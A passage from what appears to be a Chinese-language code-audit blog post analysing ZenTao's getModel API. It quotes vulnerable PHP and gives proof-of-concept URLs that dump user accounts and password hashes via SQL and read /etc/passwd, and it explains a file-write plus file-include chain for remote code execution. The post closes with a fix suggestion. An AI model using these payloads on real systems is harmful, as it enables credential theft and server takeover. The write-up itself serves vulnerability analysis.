<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">sql</span><span class="params">($sql, $keyField = <span class="string">''</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $sql  = trim($sql);</span><br><span class="line">    <span class="keyword">if</span>(strpos($sql, <span class="string">';'</span>) !== <span class="keyword">false</span>) $sql = substr($sql, <span class="number">0</span>, strpos($sql, <span class="string">';'</span>));</span><br><span class="line">    a($sql);</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">empty</span>($sql)) <span class="keyword">return</span> <span class="string">''</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(stripos($sql, <span class="string">'select '</span>) !== <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;lang-&gt;api-&gt;error-&gt;onlySelect;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">try</span></span><br><span class="line">        &#123;</span><br><span class="line">            $stmt = <span class="keyword">$this</span>-&gt;dao-&gt;query($sql);</span><br><span class="line">            <span class="keyword">if</span>(<span class="keyword">empty</span>($keyField)) <span class="keyword">return</span> $stmt-&gt;fetchAll();</span><br><span class="line">            $rows = <span class="keyword">array</span>();</span><br><span class="line">            <span class="keyword">while</span>($row = $stmt-&gt;fetch()) $rows[$row-&gt;$keyField] = $row;</span><br><span class="line">            <span class="keyword">return</span> $rows;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">catch</span>(PDOException $e)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">return</span> $e-&gt;getMessage();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>poc : <a href="http://localhost:8888/zentao/www/api-getModel-api-sql-sql=select+account,password+from+zt_user" target="_blank" rel="noopener">http://localhost:8888/zentao/www/api-getModel-api-sql-sql=select+account,password+from+zt_user</a></p>
<p><img src="https://gitee.com/car0ta/photo/raw/master/blog_photo/%E7%A6%85%E9%81%93%E5%85%A8%E7%89%88%E6%9C%ACrce%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/02.png" alt="02"></p>
<h3 id="文件读取"><a href="#文件读取" class="headerlink" title="文件读取"></a>文件读取</h3><p>漏洞代码位于 /module/file/model.php 下的parseCSV() 方法。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">parseCSV</span><span class="params">($fileName)</span></span></span><br><span class="line"><span class="function">   </span>&#123;</span><br><span class="line">       $content = file_get_contents($fileName);</span><br><span class="line">       <span class="comment">/* Fix bug #890. */</span></span><br><span class="line">       $content = str_replace(<span class="string">"\x82\x32"</span>, <span class="string">"\x10"</span>, $content);</span><br><span class="line">       $lines   = explode(<span class="string">"\n"</span>, $content);</span><br><span class="line"></span><br><span class="line">       $col  = <span class="number">-1</span>;</span><br><span class="line">       $row  = <span class="number">0</span>;</span><br><span class="line">       $data = <span class="keyword">array</span>();</span><br><span class="line">       <span class="keyword">foreach</span>($lines <span class="keyword">as</span> $line)</span><br><span class="line">       &#123;</span><br><span class="line">           $line    = trim($line);</span><br><span class="line">           $markNum = substr_count($line, <span class="string">'"'</span>) - substr_count($line, <span class="string">'\"'</span>);</span><br><span class="line">           <span class="keyword">if</span>(substr($line, <span class="number">-1</span>) != <span class="string">','</span> <span class="keyword">and</span> (($markNum % <span class="number">2</span> == <span class="number">1</span> <span class="keyword">and</span> $col != <span class="number">-1</span>) <span class="keyword">or</span> ($markNum % <span class="number">2</span> == <span class="number">0</span> <span class="keyword">and</span> substr($line, <span class="number">-2</span>) != <span class="string">',"'</span> <span class="keyword">and</span> $col == <span class="number">-1</span>))) $line .= <span class="string">','</span>;</span><br><span class="line">           $line = str_replace(<span class="string">',"",'</span>, <span class="string">',,'</span>, $line);</span><br><span class="line">           $line = str_replace(<span class="string">',"",'</span>, <span class="string">',,'</span>, $line);</span><br><span class="line">           $line = preg_replace_callback(<span class="string">'/(\"&#123;2,&#125;)(\,+)/U'</span>, <span class="keyword">array</span>(<span class="keyword">$this</span>, <span class="string">'removeInterference'</span>), $line);</span><br><span class="line">           $line = str_replace(<span class="string">'""'</span>, <span class="string">'"'</span>, $line);</span><br></pre></td></tr></table></figure>

<p>poc : <a href="http://localhost:8888/zentao/www/api-getModel-file-parseCSV-filename=/etc/passwd" target="_blank" rel="noopener">http://localhost:8888/zentao/www/api-getModel-file-parseCSV-filename=/etc/passwd</a></p>
<p><img src="https://gitee.com/car0ta/photo/raw/master/blog_photo/%E7%A6%85%E9%81%93%E5%85%A8%E7%89%88%E6%9C%ACrce%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/03.png" alt="03"></p>
<h3 id="rce"><a href="#rce" class="headerlink" title="rce"></a>rce</h3><p>这个 rce 其实是文件写入和文件包含的组合拳，最终达到远程命令执行的目的。</p>
<p>先找文件写入漏洞，漏洞代码在 module/editor/model.php 下的 save() 方法。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">save</span><span class="params">($filePath)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $fileContent = <span class="keyword">$this</span>-&gt;post-&gt;fileContent;</span><br><span class="line">    $evils       = <span class="keyword">array</span>(<span class="string">'eval'</span>, <span class="string">'exec'</span>, <span class="string">'passthru'</span>, <span class="string">'proc_open'</span>, <span class="string">'shell_exec'</span>, <span class="string">'system'</span>, <span class="string">'$$'</span>, <span class="string">'include'</span>, <span class="string">'require'</span>, <span class="string">'assert'</span>);</span><br><span class="line">    $gibbedEvils = <span class="keyword">array</span>(<span class="string">'e v a l'</span>, <span class="string">'e x e c'</span>, <span class="string">' p a s s t h r u'</span>, <span class="string">' p r o c _ o p e n'</span>, <span class="string">'s h e l l _ e x e c'</span>, <span class="string">'s y s t e m'</span>, <span class="string">'$ $'</span>, <span class="string">'i n c l u d e'</span>, <span class="string">'r e q u i r e'</span>, <span class="string">'a s s e r t'</span>);</span><br><span class="line">    $fileContent = str_ireplace($gibbedEvils, $evils, $fileContent);</span><br><span class="line">    <span class="keyword">if</span>(get_magic_quotes_gpc()) $fileContent = stripslashes($fileContent);</span><br><span class="line"></span><br><span class="line">    $dirPath = dirname($filePath);</span><br><span class="line">    $extFilePath = substr($filePath, <span class="number">0</span>, strpos($filePath, DS . <span class="string">'ext'</span> . DS) + <span class="number">4</span>);</span><br><span class="line">    <span class="keyword">if</span>(!is_dir($dirPath) <span class="keyword">and</span> is_writable($extFilePath)) mkdir($dirPath, <span class="number">0777</span>, <span class="keyword">true</span>);</span><br><span class="line">    <span class="keyword">if</span>(is_writable($dirPath))</span><br><span class="line">    &#123;</span><br><span class="line">        file_put_contents($filePath, $fileContent);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">die</span>(js::alert(<span class="keyword">$this</span>-&gt;lang-&gt;editor-&gt;notWritable . $extFilePath));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析代码逻辑，fileContent 必须通过 post 方式传参，之后对 fileContent 字符串的内容进行了黑名单过滤。有意思的是，代码逻辑看起来是想过滤危险函数及符号，但是粗心的开发人员将 str_ireplace() 函数的参数位置写反了，导致这里的过滤形同虚设。（我刚开始看的时候也没有发现，所以说开发需谨慎。）</p>
<p>我们可以看一下 str_ireplace() 函数的官方文档加深印象：</p>
<blockquote>
<p>str_ireplace<br>(PHP 5, PHP 7)</p>
<p>str_ireplace — str_replace() 的忽略大小写版本</p>
<p>说明<br><code>str_ireplace ( mixed $search , mixed $replace , mixed $subject [, int &amp;$count ] ) : mixed</code><br>该函数返回一个字符串或者数组。该字符串或数组是将 subject 中全部的 search 都被 replace 替换（忽略大小写）之后的结果。如果没有一些特殊的替换规则，你应该使用该函数替换带有 i 修正符的 preg_replace() 函数。</p>
</blockquote>
<p>继续分析，is_writeable() 函数对 filePath 作了可写限制，因此我们可以写在 /tmp 目录下，一是路径可控，二是没有权限限制。然后就可以通过 post 方式传值给 fileContent再写入文件中，供后面文件包含时使用。</p>
<p><img src="https://gitee.com/car0ta/photo/raw/master/blog_photo/%E7%A6%85%E9%81%93%E5%85%A8%E7%89%88%E6%9C%ACrce%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/04.png" alt="04"></p>
<p> 查看对应文件确认已写入：</p>
<p> <img src="https://gitee.com/car0ta/photo/raw/master/blog_photo/%E7%A6%85%E9%81%93%E5%85%A8%E7%89%88%E6%9C%ACrce%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/05.png" alt="05"></p>
<p>接下来寻找文件包含，漏洞代码在 module/api/model.php 下的 getMethod() 方法。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getMethod</span><span class="params">($filePath, $ext = <span class="string">''</span>)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $fileName  = dirname($filePath);</span><br><span class="line">        $className = basename(dirname(dirname($filePath)));</span><br><span class="line">        <span class="keyword">if</span>(!class_exists($className)) helper::import($fileName);</span><br><span class="line">        $methodName = basename($filePath);</span><br></pre></td></tr></table></figure>

<p>注意这里的 filePath 经过 dirname() 函数后返回的是父目录，想要利用我们写入的文件就必须多加一层物理路径。跟进后跳转到 /framework/base/helper.class.php 下的 import() 方法。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">import</span><span class="params">($file)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $file = realpath($file);</span><br><span class="line">        <span class="keyword">if</span>(!is_file($file)) <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">static</span> $includedFiles = <span class="keyword">array</span>();</span><br><span class="line">        <span class="keyword">if</span>(!<span class="keyword">isset</span>($includedFiles[$file]))</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">include</span> $file;</span><br><span class="line">            $includedFiles[$file] = <span class="keyword">true</span>;</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>分析可知这就是 import() 函数的功能，因此就可以轻松的包含之前写入的文件。</p>
<p><img src="https://gitee.com/car0ta/photo/raw/master/blog_photo/%E7%A6%85%E9%81%93%E5%85%A8%E7%89%88%E6%9C%ACrce%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/06.png" alt="06"></p>
<h2 id="修复建议"><a href="#修复建议" class="headerlink" title="修复建议"></a>修复建议</h2><p>原作者有讲在 zentao 其他版本上也存在该漏洞，而且存在同样地接口，所以简单粗暴的方法就是删除这个 getModel 接口。</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a href="http://foreversong.cn/archives/1410" target="_blank" rel="noopener">http://foreversong.cn/archives/1410</a></p>
<p><a href="http://llfam.cn/2019/09/13/%E5%AE%A1%E8%AE%A1%E6%80%9D%E8%80%83%E4%B9%8B%E5%AE%9A%E4%BD%8D%E6%BC%8F%E6%B4%9E/" target="_blank" rel="noopener">http://llfam.cn/2019/09/13/%E5%AE%A1%E8%AE%A1%E6%80%9D%E8%80%83%E4%B9%8B%E5%AE%9A%E4%BD%8D%E6%BC%8F%E6%B4%9E/</a></p>
<p><a href="http://devel.cnezsoft.com/book/zentaophphelp/about-10.html" target="_blank" rel="noopener">http://devel.cnezsoft.com/book/zentaophphelp/about-10.html</a></p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">car0ta</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://car0ta.github.io/2019/09/19/%E7%A6%85%E9%81%93%E5%85%A8%E7%89%88%E6%9C%ACrce%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">https://car0ta.github.io/2019/09/19/%E7%A6%85%E9%81%93%E5%85%A8%E7%89%88%E6%9C%ACrce%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/audit/">audit</a><a class="post-meta__tags" href="/tags/PHP/">PHP</a></div><div class="post_share"><div class="social-share" data-image="https://gitee.com/car0ta/photo/raw/master/blog_photo/%E7%A6%85%E9%81%93%E5%85%A8%E7%89%88%E6%9C%ACrce%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/cover.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2019/10/13/zzzphp-V1-7-2-%E5%AE%A1%E8%AE%A1%E5%88%86%E6%9E%90/"><img class="prev-cover" src="https://gitee.com/car0ta/photo/raw/master/blog_photo/zzzphpV1.7.2%E5%AE%A1%E8%AE%A1%E5%88%86%E6%9E%90/cover.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">zzzphp V1.7.2 审计分析</div></div></a></div><div class="next-post pull-right"><a href="/2019/08/02/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/"><img class="next-cover" src="https://gitee.com/car0ta/photo/raw/master/blog_photo/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/cover.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">文件上传漏洞学习</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span> Related Articles</span></div><div class="relatedPosts-list"><div><a href="/2019/10/13/zzzphp-V1-7-2-审计分析/" title="zzzphp V1.7.2 审计分析"><img class="cover" src="https://gitee.com/car0ta/photo/raw/master/blog_photo/zzzphpV1.7.2%E5%AE%A1%E8%AE%A1%E5%88%86%E6%9E%90/cover.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2019-10-13</div><div class="title">zzzphp V1.7.2 审计分析</div></div></a></div><div><a href="/2019/10/25/Discuz-ML-V3-X-代码注入漏洞分析/" title="Discuz！ML V3.X 代码注入漏洞分析"><img class="cover" src="https://gitee.com/car0ta/photo/raw/master/blog_photo/DiscuzML-V3.X-%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/cover.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2019-10-25</div><div class="title">Discuz！ML V3.X 代码注入漏洞分析</div></div></a></div><div><a href="/2020/05/01/PHP代码审计实战之YouDianCMS8-2/" title="PHP 代码审计实战之 YouDianCMS 8.2"><img class="cover" src="https://gitee.com/car0ta/photo/raw/master/blog_photo/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%AE%9E%E6%88%98%E4%B9%8BYouDianCMS8-2/cover.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-05-01</div><div class="title">PHP 代码审计实战之 YouDianCMS 8.2</div></div></a></div><div><a href="/2020/05/09/PHP代码审计实战之SIYUCMS5-1/" title="PHP 代码审计实战之 SIYUCMS 5.1"><img class="cover" src="https://gitee.com/car0ta/photo/raw/master/blog_photo/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%AE%9E%E6%88%98%E4%B9%8BSIYUCMS5-1/cover.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-05-09</div><div class="title">PHP 代码审计实战之 SIYUCMS 5.1</div></div></a></div><div><a href="/2020/02/20/ThinkPHP6任意文件操作漏洞分析/" title="ThinkPHP6 任意文件操作漏洞分析"><img class="cover" src="https://gitee.com/car0ta/photo/raw/master/blog_photo/ThinkPHP6%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/cover.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-02-20</div><div class="title">ThinkPHP6 任意文件操作漏洞分析</div></div></a></div><div><a href="/2019/10/17/php-反序列化漏洞学习/" title="php 反序列化漏洞学习"><img class="cover" src="https://gitee.com/car0ta/photo/raw/master/blog_photo/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/cover.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2019-10-17</div><div class="title">php 反序列化漏洞学习</div></div></a></div></div></div></article></main><footer id="footer" style="background-image: url(/img/index.jpg)"><div id="footer-wrap"><div class="copyright">&copy;2018 - 2020 By car0ta</div><div class="framework-info"><span>Framework </span><a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a href="https://github.com/jerryc127/hexo-theme-butterfly" target="_blank" rel="noopener">Butterfly</a></div><div class="footer_custom_text">This is my blog!</div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><i class="fas fa-arrow-up"></i></button></div></section><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><div class="js-pjax"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div><script defer="defer" id="fluttering_ribbon" mobile="true" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/canvas-fluttering-ribbon.min.js"></script><script id="click-heart" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/click-heart.min.js" async="async" mobile="true"></script></div></body></html>